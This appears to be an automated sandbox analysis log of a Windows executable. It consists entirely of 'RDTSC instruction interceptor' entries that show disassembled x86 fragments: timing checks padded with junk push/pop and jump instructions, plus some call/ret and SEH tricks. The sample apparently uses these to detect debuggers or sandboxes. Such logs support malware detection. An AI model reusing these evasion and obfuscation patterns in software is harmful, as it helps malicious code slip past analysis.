                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FE920 second address: 13FE94D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FAF1CBF1D4Fh 0x0000000b push eax 0x0000000c pop eax 0x0000000d jne 00007FAF1CBF1D46h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FAF1CBF1D4Dh 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FE94D second address: 13FE975 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CCF5669h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push edx 0x0000000f pop edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FE975 second address: 13FE981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FE981 second address: 13FE987 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13931DE second address: 13931FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FAF1CBF1D55h 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13931FD second address: 1393203 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FDD25 second address: 13FDD48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CBF1D57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007FAF1CBF1D46h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FE143 second address: 13FE14D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FE14D second address: 13FE166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF1CBF1D53h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FE423 second address: 13FE42D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FAF1CCF5656h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FE561 second address: 13FE565 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FE565 second address: 13FE569 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FE569 second address: 13FE579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FAF1CBF1D46h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1402C15 second address: 1402C3D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 jng 00007FAF1CCF5656h 0x0000000b pop esi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007FAF1CCF5666h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1403C5A second address: 1403C6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CBF1D4Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1403F2B second address: 1403F2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1403F2F second address: 1403F38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1406E00 second address: 1406E08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140E75D second address: 140E77D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAF1CBF1D51h 0x00000008 jmp 00007FAF1CBF1D4Ah 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140E9F0 second address: 140E9F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140E9F5 second address: 140EA08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 je 00007FAF1CBF1D46h 0x0000000d popad 0x0000000e push edi 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140EB4A second address: 140EB84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FAF1CCF5668h 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007FAF1CCF5668h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140ECA8 second address: 140ECAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140ECAC second address: 140ECBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007FAF1CCF565Ah 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140EFD6 second address: 140EFDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140EFDD second address: 140EFE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140EFE3 second address: 140F021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push ebx 0x00000008 push edx 0x00000009 pop edx 0x0000000a jno 00007FAF1CBF1D46h 0x00000010 pop ebx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 jmp 00007FAF1CBF1D53h 0x00000019 jmp 00007FAF1CBF1D54h 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140F15A second address: 140F15F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140F15F second address: 140F165 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140F575 second address: 140F591 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FAF1CCF5664h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1412DDD second address: 1412DE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14174BA second address: 14174BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14174BE second address: 14174C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14174C2 second address: 14174C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14174C8 second address: 14174CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D4FA2 second address: 13D500B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAF1CCF565Bh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e mov ch, 89h 0x00000010 lea eax, dword ptr [ebp+1248AD74h] 0x00000016 push 00000000h 0x00000018 push eax 0x00000019 call 00007FAF1CCF5658h 0x0000001e pop eax 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 add dword ptr [esp+04h], 00000019h 0x0000002b inc eax 0x0000002c push eax 0x0000002d ret 0x0000002e pop eax 0x0000002f ret 0x00000030 xor ecx, dword ptr [ebp+122D2764h] 0x00000036 nop 0x00000037 push ebx 0x00000038 jmp 00007FAF1CCF5666h 0x0000003d pop ebx 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007FAF1CCF565Ah 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D500B second address: 13D5027 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF1CBF1D58h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D50F8 second address: 13D51BB instructions: 0x00000000 rdtsc 0x00000002 jo 00007FAF1CCF5658h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FAF1CCF565Bh 0x00000012 xchg eax, ebx 0x00000013 add dword ptr [ebp+124592EDh], esi 0x00000019 push dword ptr fs:[00000000h] 0x00000020 jmp 00007FAF1CCF565Ah 0x00000025 mov dword ptr fs:[00000000h], esp 0x0000002c sub dword ptr [ebp+12453EF5h], edi 0x00000032 add dword ptr [ebp+122D225Dh], eax 0x00000038 mov dword ptr [ebp+1248ADCCh], esp 0x0000003e mov edi, dword ptr [ebp+122D3381h] 0x00000044 cmp dword ptr [ebp+122D2AD9h], 00000000h 0x0000004b jne 00007FAF1CCF575Fh 0x00000051 jmp 00007FAF1CCF565Eh 0x00000056 mov byte ptr [ebp+122D27ADh], 00000047h 0x0000005d push 00000000h 0x0000005f push ecx 0x00000060 call 00007FAF1CCF5658h 0x00000065 pop ecx 0x00000066 mov dword ptr [esp+04h], ecx 0x0000006a add dword ptr [esp+04h], 0000001Ah 0x00000072 inc ecx 0x00000073 push ecx 0x00000074 ret 0x00000075 pop ecx 0x00000076 ret 0x00000077 push edx 0x00000078 mov edi, 5782C816h 0x0000007d pop edi 0x0000007e mov cl, bl 0x00000080 mov eax, D49AA7D2h 0x00000085 mov edi, dword ptr [ebp+122DB09Eh] 0x0000008b push eax 0x0000008c push eax 0x0000008d push edx 0x0000008e jmp 00007FAF1CCF5669h 0x00000093 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D51BB second address: 13D51D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAF1CBF1D59h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D5497 second address: 121DA42 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FAF1CCF5656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+124548ECh], eax 0x00000014 push dword ptr [ebp+122D0131h] 0x0000001a xor edx, dword ptr [ebp+122D2BB9h] 0x00000020 call dword ptr [ebp+122D2758h] 0x00000026 pushad 0x00000027 cld 0x00000028 xor eax, eax 0x0000002a mov dword ptr [ebp+122D2EF4h], edx 0x00000030 mov edx, dword ptr [esp+28h] 0x00000034 pushad 0x00000035 call 00007FAF1CCF5665h 0x0000003a mov ebx, dword ptr [ebp+122D29A1h] 0x00000040 pop ecx 0x00000041 push ebx 0x00000042 jmp 00007FAF1CCF5668h 0x00000047 pop esi 0x00000048 popad 0x00000049 mov dword ptr [ebp+122D2A61h], eax 0x0000004f or dword ptr [ebp+122D3381h], ebx 0x00000055 mov esi, 0000003Ch 0x0000005a sub dword ptr [ebp+122D2EF4h], edx 0x00000060 jmp 00007FAF1CCF565Fh 0x00000065 add esi, dword ptr [esp+24h] 0x00000069 jmp 00007FAF1CCF5668h 0x0000006e lodsw 0x00000070 mov dword ptr [ebp+122D1882h], edi 0x00000076 add eax, dword ptr [esp+24h] 0x0000007a jmp 00007FAF1CCF5665h 0x0000007f mov ebx, dword ptr [esp+24h] 0x00000083 mov dword ptr [ebp+122D2EF4h], ebx 0x00000089 jp 00007FAF1CCF5657h 0x0000008f stc 0x00000090 push eax 0x00000091 push eax 0x00000092 push edx 0x00000093 jbe 00007FAF1CCF5658h 0x00000099 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D5568 second address: 13D5588 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CBF1D51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d jnc 00007FAF1CBF1D46h 0x00000013 pop ecx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D5776 second address: 13D5792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF1CCF5667h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D5A20 second address: 13D5A2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FAF1CBF1D46h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D6218 second address: 13D629B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jp 00007FAF1CCF5656h 0x0000000d jmp 00007FAF1CCF565Eh 0x00000012 popad 0x00000013 popad 0x00000014 nop 0x00000015 mov edi, eax 0x00000017 lea eax, dword ptr [ebp+1248ADB8h] 0x0000001d mov edi, 19C5DE51h 0x00000022 mov di, ax 0x00000025 push eax 0x00000026 pushad 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a pop edx 0x0000002b jmp 00007FAF1CCF5665h 0x00000030 popad 0x00000031 mov dword ptr [esp], eax 0x00000034 lea eax, dword ptr [ebp+1248AD74h] 0x0000003a push 00000000h 0x0000003c push ebp 0x0000003d call 00007FAF1CCF5658h 0x00000042 pop ebp 0x00000043 mov dword ptr [esp+04h], ebp 0x00000047 add dword ptr [esp+04h], 00000015h 0x0000004f inc ebp 0x00000050 push ebp 0x00000051 ret 0x00000052 pop ebp 0x00000053 ret 0x00000054 mov di, dx 0x00000057 mov ecx, dword ptr [ebp+122D2A31h] 0x0000005d nop 0x0000005e push eax 0x0000005f push eax 0x00000060 push edx 0x00000061 jp 00007FAF1CCF5656h 0x00000067 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D629B second address: 13D62AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007FAF1CBF1D48h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D62AD second address: 13D62B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D62B2 second address: 13D62B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14167BC second address: 14167C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14167C0 second address: 14167E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007FAF1CBF1D5Dh 0x0000000e jmp 00007FAF1CBF1D55h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1416AE6 second address: 1416AF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1416AF1 second address: 1416AF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1416AF7 second address: 1416AFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1419807 second address: 1419812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14194DA second address: 14194DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14194DE second address: 14194F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FAF1CBF1D4Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14194F8 second address: 14194FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14194FC second address: 1419522 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CBF1D56h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a jbe 00007FAF1CBF1D62h 0x00000010 pushad 0x00000011 push esi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141BFBA second address: 141BFEE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FAF1CCF5663h 0x0000000d jmp 00007FAF1CCF5660h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 push edx 0x0000001a pop edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141BFEE second address: 141C00A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CBF1D58h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141C00A second address: 141C013 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141C013 second address: 141C018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141C018 second address: 141C020 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141C2B4 second address: 141C2C3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007FAF1CBF1D46h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141FB8D second address: 141FB93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141FB93 second address: 141FB97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141FB97 second address: 141FBB2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jng 00007FAF1CCF5656h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAF1CCF565Bh 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141FBB2 second address: 141FBD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FAF1CBF1D58h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141FD23 second address: 141FD68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 jns 00007FAF1CCF56ABh 0x0000000d pushad 0x0000000e jmp 00007FAF1CCF565Eh 0x00000013 jmp 00007FAF1CCF5665h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FAF1CCF565Bh 0x00000020 jp 00007FAF1CCF5656h 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141FEA7 second address: 141FEB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141FEB0 second address: 141FED4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push edx 0x00000007 jmp 00007FAF1CCF5669h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141FED4 second address: 141FEEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF1CBF1D52h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141FEEA second address: 141FEEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142014D second address: 1420153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14239A6 second address: 14239AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14239AB second address: 14239C2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FAF1CBF1D52h 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1423C54 second address: 1423C5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1423C5D second address: 1423C61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1423E21 second address: 1423E27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1423E27 second address: 1423E2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1423E2B second address: 1423E2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142855F second address: 1428563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1428563 second address: 1428569 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1428569 second address: 1428576 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1428576 second address: 1428588 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CCF565Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
